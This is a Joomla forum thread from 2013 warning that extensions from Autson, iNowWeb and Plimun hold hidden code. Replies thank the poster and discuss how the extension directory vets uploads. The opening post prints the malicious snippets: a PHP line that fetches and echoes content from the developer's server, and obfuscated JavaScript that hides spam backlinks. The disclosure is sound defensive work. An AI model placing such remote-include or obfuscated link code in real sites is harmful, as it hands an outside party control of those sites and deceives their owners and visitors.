The Joomla! Forum ™



Forum rules


Forum Rules
READ ME <-- please read before posting, this means YOU.



Post new topic Reply to topic  [ 22 posts ] 
Author Message
PostPosted: Sat Mar 23, 2013 12:45 am 
Joomla! Fledgling
Joomla! Fledgling

Joined: Fri Mar 22, 2013 10:55 pm
Posts: 2
This is a notice to all developers / webmasters. Check your site to see if you have any extensions installed from Autson.com AKA iNowWeb.com AKA Plimun.com (possibly more).

Extensions from this developer/company contain malicious code that fetches a file from their server and inserts it into your site. Right now they are inserting hidden backlinks to their Payday L0ans website, which is terrible in itself as this practice can affect YOUR Google rankings, but they also have the ability to insert whatever code they like and do can whatever they like to your website. This is a huge security vulnerability. As such, the extensions have been removed from the JED, but they are still on tens of thousands of websites.

The most popular vulnerable extensions are:

- Autson Skitter Slideshow (mod_AutsonSlideShow)
The malicious code is located in the "tmpl" folder, in the php file(s).

- Share This for Joomla! (mod_JoomlaShare This)
The malicious code is located in mod_JoomlaShare This.php.

- VirtueMart Advanced Search (mod_virtuemart_advsearch)
The malicious code is located in mod_virtuemart_advsearch.php.

- AddThis For Joomla (mod_AddThisForJoomla)
The malicious code is located in mod_AddThisForJoomla.php.

- Plimun Nivo Slider (mod_PlimunNivoSlider)
The malicious code is located in the "tmpl" folder, in the php file(s).

The hidden backlinks are being inserted via the following code:

Code:
<?php
$credit=file_get_contents('http://www.inowweb.com/p.php?i='.$path);
echo $credit;
?>

or

Code:
<?php
$credit=file_get_contents('http:// www.autson.com/p.php?i='.$path);
echo $credit;
?>


etc..The file on there server that the code accesses has many different names, but the code will resemble the code above. The code is usually near the end of the php file.


This is what that code is inserting into the site:

Code:
<script language="JavaScript">
function dnnViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787',
'949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();
</script>
      
<p class="dnn"By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>

or

Code:
<script language="JavaScript">
function nemoViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896',
'877886888787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}nemoViewState();
</script>

<p class="nemonn">By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>

Additional extensions from these developers that are possibly vulnerable as well:

iNowWeb.com (author: Sharif Mamdouh):
- iNowSlider (mod_iNowSlider)
- iNow Twitter Widget (mod_TwitterWidget)
- BrainyQuote for Joomla! (mod_JoomlaBrainyQuote)
- Quotes By keyWord! (mod_JoomlaQuotes)
- iNow Wikio (mod_JoomlaWikio)
- iNow Twitter (mod_TwitterForJoomla)
- QuickJump for Joomla! (mod_quickjump)

Autson.com (author: xing):
- FaceBook Slider
- Twitter Friends & Followers
- Flying Tweets
- Autson Twitter Search
- Twitter Quote
- FaceBook Show

Plimun.com:
- Plimun Twitter Ticker
- Twitter Show

I've managed to gather a list of around 20,000 vulnerable websites that have installed extensions from this developer and are displayed hidden backlinks that are inserted by the extensions. The list is by no means comprehensive, but I believe it has a large portion of the vulnerable websites. You can see the list here: http://pastebin.com/tWfiKcrr

So what can we do to stop these spammers/hackers?

1. Remove the extensions from your or your clients websites (or just remove the malicious code).
2. Do our best to reach out to the webmasters of the sites in the pastebin list above.
3. Report their domain names for spam/abuse to
Code:
[email protected]
. They are all registered at Namecheap. The more people that complain, the more likely Namecheap will act. The domain names are:
Code:
autson.com , inowweb.com , plimun.com


The actions of developers like this adversely affects the entire Joomla community and we must do something to stop it.


Last edited by mandville on Sat Mar 23, 2013 6:41 pm, edited 1 time in total.
retitled to be more descriptive. malicious backlink code is not a vulnerability or exploit. Links found in generated code without proof of site control or infection.


Top
 Profile  
 
PostPosted: Sat Mar 23, 2013 5:10 am 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12556
Location: The Girly Side of Joomla in Sussex
It is actions like this that get a dev banned from the Jed. This dev was banned long ago

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


Top
 Profile  
 
PostPosted: Sat Mar 23, 2013 7:14 am 
Joomla! Fledgling
Joomla! Fledgling

Joined: Fri Mar 22, 2013 10:55 pm
Posts: 2
Yes, the developer was banned, but it went unnoticed for so long that now there are over 20,000 infected websites out there. I made this thread to hopefully bring more attention to the vulnerable extensions mentioned above so that the affected webmasters can be alerted to the problem and act accordingly. I know its unrealistic to reach every webmaster, but every little bit helps.


Top
 Profile  
 
PostPosted: Wed Mar 27, 2013 3:12 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Apr 27, 2009 6:21 pm
Posts: 17
Location: New Delhi, India
Thank you for this warning. Two of my most important websites were infected via the extension AddThis. I have gone ahead and removed this extension as well as the Facebook slider.

Much obliged to you for saving my websites.

_________________
This too shall pass.

Basho: "Sitting silently doing nothing, the spring comes on its own, the grass grows by itself."


Top
 Profile  
 
PostPosted: Wed Mar 27, 2013 3:21 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 25899
Location: @Webdongle
alphaprodigy wrote:
Yes, the developer was banned, but it went unnoticed for so long ...

There has been a change in JED management ... perhaps this new management is now starting to show how effective it is ? The fact that it took so long before any action was taken was due to the old JED management ?

_________________
'When I'm right nobody remembers when I'm wrong nobody forgets.'

http://weblinksonline.co.uk/joomla-faq.html
http://www.weblinksonline.co.uk/updating-joomla.html


Top
 Profile  
 
PostPosted: Wed Mar 27, 2013 4:21 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12556
Location: The Girly Side of Joomla in Sussex
Also to note that occasionally a developer will upload a clean extension to the jed for checking and then once the hits start rolling in, upload a dodgy package to their website.

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


Top
 Profile  
 
PostPosted: Wed Mar 27, 2013 4:44 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 7:19 am
Posts: 10542
Location: Leeds, UK
Webdongle wrote:
alphaprodigy wrote:
Yes, the developer was banned, but it went unnoticed for so long ...

There has been a change in JED management ... perhaps this new management is now starting to show how effective it is ? The fact that it took so long before any action was taken was due to the old JED management ?


The JED can only react to reports. I personally spotted this issue and reported it to the JED who took action immediately

_________________
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/


Top
 Profile  
 
PostPosted: Wed Mar 27, 2013 5:05 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 25899
Location: @Webdongle
brian wrote:
...
The JED can only react to reports. ...
I recall a post where it was stated that extensions were checked for malicious code in an extension before it was accepted ?

_________________
'When I'm right nobody remembers when I'm wrong nobody forgets.'

http://weblinksonline.co.uk/joomla-faq.html
http://www.weblinksonline.co.uk/updating-joomla.html


Top
 Profile  
 
PostPosted: Wed Mar 27, 2013 5:08 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Fri Aug 12, 2005 7:19 am
Posts: 10542
Location: Leeds, UK
Sadly its not possible to ensure that the version uploaded is the same as the version that is available for download. Not is it possible to ensure that every single update is checked. You only need to see how often the most popular extensions from nonumber are often to appreciate that it is impossible to check every single release

_________________
"Exploited yesterday... Hacked tomorrow"
Blog http://brian.teeman.net/
Joomla Hidden Secrets http://hiddenjoomlasecrets.com/


Top
 Profile  
 
PostPosted: Wed Mar 27, 2013 5:53 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Sat Apr 05, 2008 9:58 pm
Posts: 25899
Location: @Webdongle
brian wrote:
... Not is it possible to ensure that every single update is checked. You only need to see how often the most popular extensions from nonumber are often to appreciate that it is impossible to check every single release
That's a good point ... pity there are not more people checking.

_________________
'When I'm right nobody remembers when I'm wrong nobody forgets.'

http://weblinksonline.co.uk/joomla-faq.html
http://www.weblinksonline.co.uk/updating-joomla.html


Top
 Profile  
 
PostPosted: Thu Mar 28, 2013 2:38 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Apr 27, 2009 6:21 pm
Posts: 17
Location: New Delhi, India
I've have become economical in the use of Joomla extensions. Especially since I have upgraded to Joomla 2.5. The migration was a headache as many extensions either had been discontinued or the upgrade was not available.

Plus my most valuable site was hacked due to doorways in certain extensions. Even paid extensions.

Joomla is a robust platform. With almost a minimal use of extensions, I have brought my expectations down and do not opt for the fancy stuff immediately.

Still, even then I had been beguiled into believing that some extensions are okay, which it seems they are not.

Now days I am very strict in incorporating extensions in my website. Some of extensions I cannot do without, and have to use them.

I believe, eventually in a few years time, Joomla would have most of the basic requirements of a website built in native.

_________________
This too shall pass.

Basho: "Sitting silently doing nothing, the spring comes on its own, the grass grows by itself."


Top
 Profile  
 
PostPosted: Mon Apr 08, 2013 11:19 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Mar 28, 2011 2:43 pm
Posts: 12
Wow, I'm quite surprised that someone would do so much effort to contact and inform website owners about these malicious extensions.

I received a random email from a certain Tom E informing me of Add-This, etc.

Although I grateful that he notified me, I surprised that someone would go to such great lengths to let me know. My website (ezywebsites.co.za) is one of the 20 000 mentioned in the first post.

Yet. as soon as I get a chance, I'll check all my clients.

_________________
Francois du Toit
Webpreneur
Latest Niche Site: http://www.health2u.co.za/during-pregnancy
http://www.ezywebsites.co.za


Top
 Profile  
 
PostPosted: Tue Apr 09, 2013 4:00 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Sat Mar 17, 2012 6:53 pm
Posts: 22
You have my greatest thanks, alphaprodigy. I've immediately remove the malicious code from the Autson Slideshow.


Top
 Profile  
 
PostPosted: Tue Apr 09, 2013 11:11 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Tue Apr 09, 2013 11:06 pm
Posts: 1
Additional Behaviour noticed with [spam] for Joomla! :

The extension was used/evaluated for use for website(s) by me/us, and some peculiar behaviour was noticed.

1> The above mentioned extension used to load an unsecure code. (We accidentally discovered it when we enabled site-wide SSL/HTTPS a few months ago). when Linkedin (and maybe social options were selected), a nasty browser warning (for loading unsecure content) used to be thrown up. The issue was not investigated further (it was easier to find an alternative extension)

2>Another aspect worth mentioning the above mentioned backlinks are not loaded in some configurations (but is definitely loaded when LinkedIN is selected), which suggests there may be more lines of code controlling the backlink's behaviour.

Hence I suggest you rephrase/remove (or just remove the malicious code)

as this may give a false sense of security that the issue has been fixed by removing a few lines of code (and something else may get missed)


Top
 Profile  
 
PostPosted: Sun Apr 14, 2013 9:07 am 
Joomla! Fledgling
Joomla! Fledgling

Joined: Wed Aug 22, 2012 2:11 pm
Posts: 3
I also received an email from someone at a gmail account warning me that my site was infected and pointing me to this thread. The code was there so I disabled and uninstalled the addthis extension that was causing the problem and the code is now gone. THANK YOU SO MUCH for letting me know, much appreciated!

Now does anyone know of a reliable free alternative to the addthis social sharing extension? This has put me off a little and I'm not sure what to choose anymore...

Luigi


Top
 Profile  
 
PostPosted: Tue Apr 16, 2013 10:07 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Apr 08, 2013 9:06 pm
Posts: 5
Thanks for the email,I seem to have removed the script and deleted the plugin, Seems to only have been on my home page as i can`t see it on any of the other page sources (i hope). Does anyone know a safe plugin for the twitter/facebook/google icons on my website so i can tweet/like post new products i list?


Top
 Profile  
 
PostPosted: Tue Apr 16, 2013 10:02 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Mon Apr 08, 2013 9:06 pm
Posts: 5
i'm surprised There has not been more comments on this, I have had the rogue plugin on my site fro over 10 months, with over 20,000 sites affected thought this topic would be bigger than it is?


Top
 Profile  
 
PostPosted: Tue Apr 16, 2013 11:35 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12556
Location: The Girly Side of Joomla in Sussex
mark4740 wrote:
i'm surprised There has not been more comments on this, I have had the rogue plugin on my site fro over 10 months, with over 20,000 sites affected thought this topic would be bigger than it is?

You are relying on the belief that people feel compelled to come here and say "me2" "+1" "i owe you my first born"
the OP did their apparent civic duty informing people to the issue, this is not the proverbial field of dreams.
people downloaded and installed the extensions, got caught, got notified and hopefully removed it. End of most peoples stories regarding this developer

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


Top
 Profile  
 
PostPosted: Sat Apr 20, 2013 3:36 am 
Joomla! Fledgling
Joomla! Fledgling

Joined: Sat Apr 20, 2013 3:29 am
Posts: 1
I would like to say thanks to whomever tipped me off. I sent them an email, but maybe they will see it here.

Anyway, thank you.

jw


Top
 Profile  
 
PostPosted: Sat Apr 27, 2013 4:06 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Sat Apr 27, 2013 4:01 pm
Posts: 1
Thanks for the email, the script have removed when deleted the plugin!


Top
 Profile  
 
PostPosted: Mon Feb 03, 2014 5:04 pm 
Joomla! Apprentice
Joomla! Apprentice

Joined: Thu Feb 12, 2009 4:32 pm
Posts: 9
I got burned by this extension, and found out the hard way, had to search through my site for the vulnerability. I went to the vulnerable extensions (Live VEL) page and there is no listing for Autson slideshow. Joomla has almost no control over extensions, unlike other CMSs. I hope to get all my Joomla sites converted to Drupal soon.


Top
 Profile  
 
PostPosted: Mon Feb 03, 2014 6:22 pm 
User avatar
Joomla! Master
Joomla! Master

Joined: Mon Mar 20, 2006 1:56 am
Posts: 12556
Location: The Girly Side of Joomla in Sussex
paulfoos wrote:
had to search through my site for the vulnerability.
with all due respect please do not confuse "malicious" with "vulnerable"
Quote:
I went to the vulnerable extensions (Live VEL) page and there is no listing for Autson slideshow.
the extensions are listed there http://vel.joomla.org/articles/844-spot ... sions.html Published on Tuesday, 27 August 2013

quite often extensions downloaded from the devs website have "extra" code not in the zip provided to jed for checking

_________________
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be added to the foe list and possibly just deleted
{Community.Connect Administrator }{ Showcase & Security Moderator}


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 22 posts ] 



Who is online

Users browsing this forum: No registered users and 17 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group